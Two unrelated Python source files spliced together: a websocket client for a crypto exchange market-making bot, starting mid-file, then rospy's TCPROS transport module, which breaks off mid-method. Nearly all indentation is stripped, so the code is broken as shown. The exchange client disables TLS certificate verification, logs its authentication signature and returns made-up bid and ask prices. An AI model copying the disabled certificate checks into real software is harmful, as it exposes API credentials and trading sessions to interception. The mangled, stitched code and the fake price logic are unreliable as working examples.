# On connect, it synchronously asks for a push of all this data then returns.
# Right after, the MM can start using its data. It will be updated in realtime, so the MM can
# poll as often as it wants.
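# Typical usage from the market maker (illustrative sketch; the order prefix is hypothetical):
#   ws = GTEWebsocket()
#   ws.connect(shouldAuth=True)          # blocks until the first partial messages arrive
#   ticker = ws.get_ticker('BTC_USD')
#   orders = ws.open_orders('mm_gte_')   # only orders we placed, with leavesQty > 0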
class GTEWebsocket():
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self):
self.logger = logging.getLogger('root')
self.__reset()
self.data = {}  # Data structures maintained by the client; not the raw message payloads
self.ws_url = settings.WS_URL
self.keys = {}
def __del__(self):
self.exit()
# We run one symbol per process,
# so there is no need to cover multiple instrument types/assets/symbols.
def connect(self, endpoint="", shouldAuth=True):
'''Connect to the websocket and initialize data stores.'''
self.logger.debug("Connecting GTE WebSocket.")
self.shouldAuth = shouldAuth
wsURL = self.ws_url
self.logger.info("Connecting to %s" % wsURL)
self.__connect(wsURL)  # auth info is carried in the HTTP header
self.logger.info('Connected to WS. Now to subscribe some sample data')
# By convention a single process never spans settlement currencies or instrument
# types; otherwise the bookkeeping becomes too complicated.
# To trade multiple settlement areas or instruments, run multiple processes.
sub_settle_currencys = 'BTC'
instrument_type = 'pc'
sub_symbols = ['BTC_USD']  # symbols we intend to subscribe to / trade
for symbol in sub_symbols:
args = {
"instrument_type":instrument_type,
"table":"instrument",
"settle_currency":sub_settle_currencys,
"symbol":symbol
}
self.__send_command('sub',args)
args = {
"instrument_type":instrument_type,
"table":"trade",
"settle_currency":sub_settle_currencys,
"symbol":symbol
}
self.__send_command('sub',args)
args = {
"instrument_type":instrument_type,
"table":"order_book",
"settle_currency":sub_settle_currencys,
"symbol":symbol
}
self.__send_command('sub',args)
# Connected. Wait for partials
# Make sure initialization only finishes after the first partial message has been received.
self.__wait_for_symbol(symbol)
self.shouldAuth = True
if self.shouldAuth:
# Authenticate via a websocket command
expires = int(round(time.time()) + 60)*1000 # 60s grace period in case of clock skew
message = "GET/ws" + str(expires)
signature = hmac.new(bytes(settings.API_SECRET, 'utf8'), bytes(message, 'utf8'), digestmod=hashlib.sha256).hexdigest()
args = {
"api_key" : settings.API_KEY,
"expires" : str(expires),
"signature" : signature
}
self.logger.info('expires:'+ str(expires))
self.logger.info('expmessage:'+ message)
self.logger.info('signature:'+ signature)
self.__send_command('auth_key_expires',args)
# Subscribe to account information
args = {
"instrument_type":settings.INSTRUMENTTYPE,
"table":"order",
"settle_currency":settings.SETTLECURRENCY,
"symbol":settings.SYMBOL
}
self.__send_command('sub',args)
args = {
"instrument_type":settings.INSTRUMENTTYPE,
"table":"execution",
"settle_currency":settings.SETTLECURRENCY,
"symbol":settings.SYMBOL
}
self.__send_command('sub',args)
args = {
"instrument_type":settings.INSTRUMENTTYPE,
"table":"position",
"settle_currency":settings.SETTLECURRENCY,
"symbol":settings.SYMBOL
}
self.__send_command('sub',args)
self.__wait_for_account()
self.logger.info('Got sample market data. Starting.')
#
# Data methods
#
def get_instrument(self, symbol):
#self.logger.info(list(self.data.keys()))
instruments = self.data['instrument']
#self.logger.info(instruments)
matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tick_size'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
# For now, fake bid/ask values around the last price
bid = float(instrument['last_price']) - 5
ask = float(instrument['last_price']) + 2.5
'''
bid = instrument['bidPrice'] or instrument['last_price']
ask = instrument['askPrice'] or instrument['last_price']
'''
ticker = {
"last": instrument['last_price'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
#return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
return {k: toNearest(float(v or 0), 0.5) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
# Return all positions for the given settlement currency, instrument type and symbol.
# The result is a list.
def position(self,instrument_type, settle_currency,symbol):
positions = self.data['position']
pos = [p for p in positions if p['instrument_type'] == instrument_type and p['settle_currency'] == settle_currency and p['symbol'] == symbol ]
if len(pos) == 0:
# No position found; stub it
#return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
pass
return pos
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
#self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs)) # with SSL verification
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})) # without SSL verification
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
# while not {'margin', 'position', 'order'} <= set(self.data):
while not {'position', 'order'} <= set(self.data): # no 'margin' table yet
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'order_book'} <= set(self.data):
sleep(0.1)
# Takes a command and args; args may be empty
def __send_command(self, command, args=None):
'''Send a raw command.'''
self.logger.debug(json.dumps({"op": command, "args": args or ""}))
self.ws.send(json.dumps({"op": command, "args": args or ""}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
#self.logger.info(json.dumps(message))
if 'status' in message: # status-type message
if message['status'] == 400:
self.error(message['error'])
elif message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
else:
pass
return
elif 'data' in message: # data message
table = message['table'] if 'table' in message else None # table (topic) name
action = message['action'] if 'action' in message else None
if not action:
self.logger.info(json.dumps(message))
if table not in self.data: # e.g. orderbookL2 has not arrived yet
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
#self.keys[table] = message['data']['keys'] # self.keys[table] stores the unique-key fields for each table
# For now we assign them manually
self.keys['instrument'] = ['settle_currency','asset_class','symbol']
self.keys['trade'] = ['settle_currency','asset_class','symbol']
self.keys['order_book'] = ['id']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order_book'] and len(self.data[table]) > GTEWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(GTEWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
self.logger.debug('updating data %s not found in %s' % ( updateData,table))
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
def __on_open(self):
self.logger.info("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, ws, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
# keys:['symbol','id']
# table: self.data['orderbook'], covering every symbol on the exchange
# matchData: a single item from message['data']['rows']
def findItemByKeys(keys, table, matchData):
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
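# Illustrative sketch (added for clarity, not part of the original module): how the
# per-table key lists are used to apply an 'update' row to the cached data. The
# field values below are made-up examples.
def _example_apply_update():
    keys = ['settle_currency', 'asset_class', 'symbol']
    table = [{'settle_currency': 'BTC', 'asset_class': 'pc',
              'symbol': 'BTC_USD', 'last_price': 9000}]
    update = {'settle_currency': 'BTC', 'asset_class': 'pc',
              'symbol': 'BTC_USD', 'last_price': 9005}
    item = findItemByKeys(keys, table, update)
    if item:
        item.update(update)  # in-place update of the cached row
    return table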
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
ws = GTEWebsocket()
ws.logger = logger
ws.connect("wss://td.gte.io")
while(ws.ws.sock.connected):
sleep(1)
|
tcpros_base.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Revision $Id$
"""Internal use: common TCPROS libraries"""
try:
from cStringIO import StringIO #Python 2.x
python3 = 0
except ImportError:
from io import StringIO, BytesIO #Python 3.x
python3 = 1
import os
import socket
import logging
import threading
import time
import traceback
import select
import rosgraph
import rosgraph.network
from genpy import DeserializationError, Message
from rosgraph.network import read_ros_handshake_header, write_ros_handshake_header
# TODO: remove * import from core
from rospy.core import *
from rospy.core import logwarn, loginfo, logerr, logdebug, rospydebug, rospyerr, rospywarn
from rospy.exceptions import ROSInternalException, TransportException, TransportTerminated, TransportInitError
from rospy.msg import deserialize_messages, serialize_message
from rospy.service import ServiceException
from rospy.impl.transport import Transport, BIDIRECTIONAL
logger = logging.getLogger('rospy.tcpros')
# Receive buffer size for topics/services (in bytes)
DEFAULT_BUFF_SIZE = 65536
## name of our customized TCP protocol for accepting flows over server socket
TCPROS = "TCPROS"
_PARAM_TCP_KEEPALIVE = '/tcp_keepalive'
_use_tcp_keepalive = None
_use_tcp_keepalive_lock = threading.Lock()
def _is_use_tcp_keepalive():
global _use_tcp_keepalive
if _use_tcp_keepalive is not None:
return _use_tcp_keepalive
with _use_tcp_keepalive_lock:
if _use_tcp_keepalive is not None:
return _use_tcp_keepalive
# in order to prevent circular dependencies, this does not use the
# builtin libraries for interacting with the parameter server
m = rospy.core.xmlrpcapi(rosgraph.get_master_uri())
code, msg, val = m.getParam(rospy.names.get_caller_id(), _PARAM_TCP_KEEPALIVE)
_use_tcp_keepalive = val if code == 1 else True
return _use_tcp_keepalive
def recv_buff(sock, b, buff_size):
"""
Read data from socket into buffer.
@param sock: socket to read from
@type sock: socket.socket
@param b: buffer to receive into
@type b: StringIO
@param buff_size: recv read size
@type buff_size: int
@return: number of bytes read
@rtype: int
"""
d = sock.recv(buff_size)
if d:
b.write(d)
return len(d)
else: #bomb out
raise TransportTerminated("unable to receive data from sender, check sender's logs for details")
class TCPServer(object):
"""
Simple server that accepts inbound TCP/IP connections and hands
them off to a handler function. TCPServer obeys the
ROS_IP/ROS_HOSTNAME environment variables
"""
def __init__(self, inbound_handler, port=0):
"""
Setup a server socket listening on the specified port. If the
port is omitted, will choose any open port.
@param inbound_handler: handler to invoke with
new connection
@type inbound_handler: fn(sock, addr)
@param port: port to bind to, omit/0 to bind to any
@type port: int
"""
self.port = port #will get overwritten if port=0
self.addr = None #set at socket bind
self.is_shutdown = False
self.inbound_handler = inbound_handler
try:
self.server_sock = self._create_server_sock()
except:
self.server_sock = None
raise
def start(self):
"""Runs the run() loop in a separate thread"""
t = threading.Thread(target=self.run, args=())
t.setDaemon(True)
t.start()
def run(self):
"""
Main TCP receive loop. Should be run in a separate thread -- use start()
to do this automatically.
"""
self.is_shutdown = False
if not self.server_sock:
raise ROSInternalException("%s did not connect"%self.__class__.__name__)
while not self.is_shutdown:
try:
(client_sock, client_addr) = self.server_sock.accept()
except socket.timeout:
continue
except IOError as e:
(errno, msg) = e.args
if errno == 4: #interrupted system call
continue
raise
if self.is_shutdown:
break
try:
#leave threading decisions up to inbound_handler
self.inbound_handler(client_sock, client_addr)
except socket.error as e:
if not self.is_shutdown:
traceback.print_exc()
logwarn("Failed to handle inbound connection due to socket error: %s"%e)
logdebug("TCPServer[%s] shutting down", self.port)
def get_full_addr(self):
"""
@return: (ip address, port) of server socket binding
@rtype: (str, int)
"""
# return rosgraph.network.get_host_name() instead of address so that it
# obeys ROS_IP/ROS_HOSTNAME behavior
return (rosgraph.network.get_host_name(), self.port)
def _create_server_sock(self):
"""
binds the server socket. ROS_IP/ROS_HOSTNAME may restrict
binding to loopback interface.
"""
if rosgraph.network.use_ipv6():
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
logdebug('binding to ' + str(rosgraph.network.get_bind_address()) + ' ' + str(self.port))
server_sock.bind((rosgraph.network.get_bind_address(), self.port))
(self.addr, self.port) = server_sock.getsockname()[0:2]
logdebug('bound to ' + str(self.addr) + ' ' + str(self.port))
server_sock.listen(5)
return server_sock
def shutdown(self):
"""shutdown I/O resources uses by this server"""
if not self.is_shutdown:
self.is_shutdown = True
self.server_sock.close()
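# Hedged usage sketch (not part of rospy): TCPServer simply hands each accepted
# (socket, address) pair to the inbound handler; the handler and function names
# below are hypothetical, and the handler only closes the connection.
def _example_inbound_handler(sock, addr):
    # A real handler would read the TCPROS handshake header here.
    sock.close()

def _example_run_tcp_server():
    server = TCPServer(_example_inbound_handler, port=0)  # 0 = any free port
    server.start()
    addr = server.get_full_addr()  # (hostname, chosen port)
    server.shutdown()
    return addr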
# base maintains a tcpros_server singleton that is shared between
# services and topics for inbound connections. This global is set in
# the tcprosserver constructor. Constructor is called by init_tcpros()
_tcpros_server = None
def init_tcpros_server(port=0):
"""
starts the TCPROS server socket for inbound connections
@param port: listen on the provided port. If the port number is 0, the port will
be chosen randomly
@type port: int
"""
global _tcpros_server
if _tcpros_server is None:
_tcpros_server = TCPROSServer(port=port)
rospy.core.add_shutdown_hook(_tcpros_server.shutdown)
return _tcpros_server
def start_tcpros_server():
"""
start the TCPROS server if it has not started already
"""
if _tcpros_server is None:
init_tcpros_server()
return _tcpros_server.start_server()
# provide an accessor of this so that the TCPROS Server is entirely hidden from upper layers
def get_tcpros_server_address():
"""
get the address of the tcpros server.
@raise Exception: if tcpros server has not been started or created
"""
return _tcpros_server.get_address()
def _error_connection_handler(sock, client_addr, header):
"""
utility handler that does nothing more than provide a rejection header
@param sock: socket connection
@type sock: socket.socket
@param client_addr: client address
@type client_addr: str
@param header: request header
@type header: dict
"""
return {'error': "unhandled connection"}
class TCPROSServer(object):
"""
ROS Protocol handler for TCPROS. Accepts both TCPROS topic
connections as well as ROS service connections over TCP. TCP server
socket is run once start_server() is called -- this is implicitly
called during init_publisher().
"""
def __init__(self, port=0):
"""
Constructor
@param port: port number to bind to (default 0/any)
@type port: int
"""
self.port = port
self.tcp_ros_server = None #: server for receiving tcp conn
self.lock = threading.Lock()
# should be set to fn(sock, client_addr, header) for topic connections
self.topic_connection_handler = _error_connection_handler
# should be set to fn(sock, client_addr, header) for service connections
self.service_connection_handler = _error_connection_handler
def start_server(self):
"""
Starts the TCP socket server if one is not already running
"""
if self.tcp_ros_server:
return
with self.lock:
try:
if not self.tcp_ros_server:
self.tcp_ros_server = TCPServer(self._tcp_server_callback, self.port)
self.tcp_ros_server.start()
except Exception as e:
self.tcp_ros_server = None
logerr("unable to start TCPROS server: %s\n%s"%(e, traceback.format_exc()))
return 0, "unable to establish TCPROS server: %s"%e, []
def get_address(self):
"""
@return: address and port of TCP server socket for accepting
inbound connections
@rtype: str, int
"""
if self.tcp_ros_server is not None:
return self.tcp_ros_server.get_full_addr()
return None, None
def shutdown(self, reason=''):
"""stops the TCP/IP server responsible for receiving inbound connections"""
if self.tcp_ros_server:
self.tcp_ros_server.shutdown()
def _tcp_server_callback(self, sock, client_addr):
"""
TCPServer callback: detects incoming topic or service connection and passes connection accordingly
@param sock: socket connection
@type sock: socket.socket
@param client_addr: client address
@type client_addr: (str, int)
@raise TransportInitError: If transport cannot be successfully initialized
"""
#TODOXXX:rewrite this logic so it is possible to create TCPROSTransport object first, set its protocol,
#and then use that to do the writing
try:
buff_size = 4096 # size of read buffer
if python3 == 0:
#Python 2: read the handshake header into a StringIO; the Python 3 branch below uses BytesIO (instead of bytearray)
header = read_ros_handshake_header(sock, StringIO(), buff_size)
else:
header = read_ros_handshake_header(sock, BytesIO(), buff_size)
if 'topic' in header:
err_msg = self.topic_connection_handler(sock, client_addr, header)
elif 'service' in header:
err_msg = self.service_connection_handler(sock, client_addr, header)
else:
err_msg = 'no topic or service name detected'
if err_msg:
# shutdown race condition: nodes that come up and down
# quickly can receive connections during teardown.
# We use is_shutdown_requested() because we can get
# into bad connection states during client shutdown
# hooks.
if not rospy.core.is_shutdown_requested():
write_ros_handshake_header(sock, {'error' : err_msg})
raise TransportInitError("Could not process inbound connection: "+err_msg+str(header))
else:
write_ros_handshake_header(sock, {'error' : 'node shutting down'})
return
except rospy.exceptions.TransportInitError as e:
logwarn(str(e))
if sock is not None:
sock.close()
except Exception as e:
# collect stack trace separately in local log file
if not rospy.core.is_shutdown_requested():
logwarn("Inbound TCP/IP connection failed: %s", e)
rospyerr("Inbound TCP/IP connection failed:\n%s", traceback.format_exc())
if sock is not None:
sock.close()
class TCPROSTransportProtocol(object):
"""
Abstraction of TCPROS connections. Service/Publisher/Subscriber implementations must implement this
protocol, which defines how messages are deserialized from an inbound connection (read_messages()) as
well as which fields to send when creating a new connection (get_header_fields()).
"""
def __init__(self, resolved_name, recv_data_class, queue_size=None, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor
@param resolved_name: resolved service or topic name
@type resolved_name: str
@param recv_data_class: message class for deserializing inbound messages
@type recv_data_class: Class
@param queue_size: maximum number of inbound messages to maintain
@type queue_size: int
@param buff_size: receive buffer size (in bytes) for reading from the connection.
@type buff_size: int
"""
if recv_data_class and not issubclass(recv_data_class, Message):
raise TransportInitError("Unable to initialize transport: data class is not a message data class")
self.resolved_name = resolved_name
self.recv_data_class = recv_data_class
self.queue_size = queue_size
self.buff_size = buff_size
self.direction = BIDIRECTIONAL
def read_messages(self, b, msg_queue, sock):
"""
@param b StringIO: read buffer
@param msg_queue [Message]: queue of deserialized messages
@type msg_queue: [Message]
@param sock socket: protocol can optionally read more data from
the socket, but in most cases the required data will already be
in b
"""
# default implementation
deserialize_messages(b, msg_queue, self.recv_data_class, queue_size=self.queue_size)
def get_header_fields(self):
"""
Header fields that should be sent over the connection. The header fields
are protocol specific (i.e. service vs. topic, publisher vs. subscriber).
@return: {str : str}: header fields to send over connection
@rtype: dict
"""
return {}
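# Minimal sketch of a concrete protocol (illustrative only, not part of rospy):
# subclasses mainly customize the handshake fields, while read_messages() already
# has a usable default. The field values below are placeholders, not real message
# metadata.
class _ExampleTopicProtocol(TCPROSTransportProtocol):
    def get_header_fields(self):
        return {'topic': self.resolved_name,
                'md5sum': '*',
                'type': '*',
                'callerid': '/example_node'}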
# TODO: this still isn't as clean and seamless as I want it to
# be. This code came from the merger of publisher, subscriber, and
# service code into a common TCPROS transport class. The transport is
# customized by a 'protocol' class, which is how the different
# pub/sub/service behaviors are achieved. More behavior needs to be
# transferred from the transport class into the protocol class,
# e.g. deserialization as the state each maintains is somewhat
# duplicative. I would also come up with a better name than
# protocol.
class TCPROSTransport(Transport):
"""
Generic implementation of TCPROS exchange routines for both topics and services
"""
transport_type = 'TCPROS'
def __init__(self, protocol, name, header=None):
"""
ctor
@param name str: identifier
@param protocol TCPROSTransportProtocol protocol implementation
@param header dict: (optional) handshake header if transport handshake header was
already read off of transport.
@raise TransportInitError if transport cannot be initialized according to arguments
"""
super(TCPROSTransport, self).__init__(protocol.direction, name=name)
if not name:
raise TransportInitError("Unable to initialize transport: name is not set")
self.protocol = protocol
self.socket = None
self.endpoint_id = 'unknown'
self.callerid_pub = 'unknown'
self.dest_address = None # for reconnection
if python3 == 0: # Python 2.x
self.read_buff = StringIO()
self.write_buff = StringIO()
else: # Python 3.x
self.read_buff = BytesIO()
self.write_buff = BytesIO()
#self.write_buff = StringIO()
self.header = header
# #1852 have to hold onto latched messages on subscriber side
self.is_latched = False
self.latch = None
# save the fileno separately so we can garbage collect the
# socket but still unregister with poll objects
self._fileno = None
# these fields are actually set by the remote
# publisher/service. they are set for tools that connect
# without knowing the actual field name
self.md5sum = None
self.type = None
# Endpoint Details (IP, Port)
self.local_endpoint = (None, None)
self.remote_endpoint = (None, None)
def get_transport_info(self):
"""
Get detailed connection information.
Similar to getTransportInfo() in 'libros/transport/transport_tcp.cpp'
e.g. TCPROS connection on port 41374 to [127.0.0.1:40623 on socket 6]
"""
return "%s connection on port %s to [%s:%s on socket %s]" % (self.transport_type, self.local_endpoint[1], self.remote_endpoint[0], self.remote_endpoint[1], self._fileno)
def fileno(self):
"""
Get descriptor for select
"""
return self._fileno
def set_endpoint_id(self, endpoint_id):
"""
Set the endpoint_id of this transport.
Allows the endpoint_id to be set before the socket is initialized.
"""
self.endpoint_id = endpoint_id
def set_socket(self, sock, endpoint_id):
"""
Set the socket for this transport
@param sock: socket
@type sock: socket.socket
@param endpoint_id: identifier for connection endpoint
@type endpoint_id: str
@raise TransportInitError: if socket has already been set
"""
if self.socket is not None:
raise TransportInitError("socket already initialized")
self.socket = sock
self.endpoint_id = endpoint_id
self._fileno = sock.fileno()
self.local_endpoint = self.socket.getsockname()
def connect(self, dest_addr, dest_port, endpoint_id, timeout=None):
"""
Establish TCP connection to the specified
address/port. connect() always calls L{write_header()} and
L{read_header()} after the connection is made
@param dest_addr: destination IP address
@type dest_addr: str
@param dest_port: destination port
@type dest_port: int
@param endpoint_id: string identifier for connection (for statistics)
@type endpoint_id: str
@param timeout: (optional keyword) timeout in seconds
@type timeout: float
@raise TransportInitError: if unable to create connection
"""
# first make sure that if ROS_HOSTNAME=localhost, we will not attempt
# to connect to anything other than localhost
if ("ROS_HOSTNAME" in os.environ) and (os.environ["ROS_HOSTNAME"] == "localhost"):
if not rosgraph.network.is_local_address(dest_addr):
msg = "attempted to connect to non-local host [%s] from a node launched with ROS_HOSTNAME=localhost" % (dest_addr)
logwarn(msg)
self.close()
raise TransportInitError(msg) # bubble up
# now we can proceed with trying to connect.
try:
self.endpoint_id = endpoint_id
self.dest_address = (dest_addr, dest_port)
if rosgraph.network.use_ipv6():
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if _is_use_tcp_keepalive():
# OSX (among others) does not define these options
if hasattr(socket, 'TCP_KEEPCNT') and \
hasattr(socket, 'TCP_KEEPIDLE') and \
hasattr(socket, 'TCP_KEEPINTVL'):
# turn on KEEPALIVE
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# - number of keepalive failures before actual connection failure
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPCNT, 9)
# - timeout before starting KEEPALIVE process
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPIDLE, 60)
# - interval to send KEEPALIVE after IDLE timeout
s.setsockopt(socket.SOL_TCP, socket.TCP_KEEPINTVL, 10)
if timeout is not None:
s.settimeout(timeout)
self.socket = s
logdebug('connecting to ' + str(dest_addr)+ ' ' + str(dest_port))
self.socket.connect((dest_addr, dest_port))
self.write_header()
self.read_header()
self.local_endpoint = self.socket.getsockname()
self.remote_endpoint = (dest_addr, dest_port)
except TransportInitError as tie:
rospyerr("Unable to initiate TCP/IP socket to %s:%s (%s): %s"%(dest_addr, dest_port, endpoint_id, traceback.format_exc()))
raise
except Exception as e:
#logerr("Unknown error initiating TCP/IP socket to %s:%s (%s): %s"%(dest_addr, dest_port, endpoint_id, str(e)))
rospywarn("Unknown error initiating TCP/IP socket to %s:%s (%s): %s"%(dest_addr, dest_port, endpoint_id, traceback.format_exc()))
# check for error type and reason. On unknown errors the socket will be closed
# to avoid reconnection and error reproduction
if not isinstance(e, socket.error):
# FATAL: no reconnection as error is unknown
self.close()
elif not isinstance(e, socket.timeout) and e.errno not in [100, 101, 102, 103, 110, 112, 113]:
# reconnect in the following cases, otherwise close the socket:
# 1. socket.timeout: on timeouts caused by delays on wireless links
# 2. ENETDOWN (100), ENETUNREACH (101), ENETRESET (102), ECONNABORTED (103):
# while using ROS_HOSTNAME ros binds to a specific interface. These errors
# are thrown on interface shutdown e.g. on reconnection in LTE networks
# 3. ETIMEDOUT (110): same like 1. (for completeness)
# 4. EHOSTDOWN (112), EHOSTUNREACH (113): while network and/or DNS-server is not reachable
#
# no reconnection as error is not 1.-4.
self.close()
raise TransportInitError(str(e)) #re-raise i/o error
def _validate_header(self, header):
"""
Validate header and initialize fields accordingly
@param header: header fields from publisher
@type header: dict
@raise TransportInitError: if header fails to validate
"""
self.header = header
if 'error' in header:
raise TransportInitError("remote error reported: %s"%header['error'])
for required in ['md5sum', 'type']:
if not required in header:
raise TransportInitError("header missing required field [%s]"%required)
self.type = header['type']
self.md5sum = header['md5sum']
if 'callerid' in header:
self.callerid_pub = header['callerid']
if header.get('latching', '0') == '1':
self.is_latched = True
def write_header(self):
"""Writes the TCPROS header to the active connection."""
# socket may still be getting spun up, so wait for it to be writable
sock = self.socket
protocol = self.protocol
# race condition on close, better fix is to pass these in,
# functional style, but right now trying to cause minimal
# perturbance to codebase.
if sock is None or protocol is None:
return
fileno = sock.fileno()
ready = None
poller = None
if hasattr(select, 'poll'):
poller = select.poll()
poller.register(fileno, select.POLLOUT)
while not ready:
events = poller.poll()
for _, flag in events:
if flag & select.POLLOUT:
ready = True
else:
while not ready:
try:
_, ready, _ = select.select([], [fileno], [])
except ValueError as e:
logger.error("[%s]: select fileno '%s': %s", self.name, str(fileno), str(e))
raise
logger.debug("[%s]: writing header", self.name)
sock.setblocking(1)
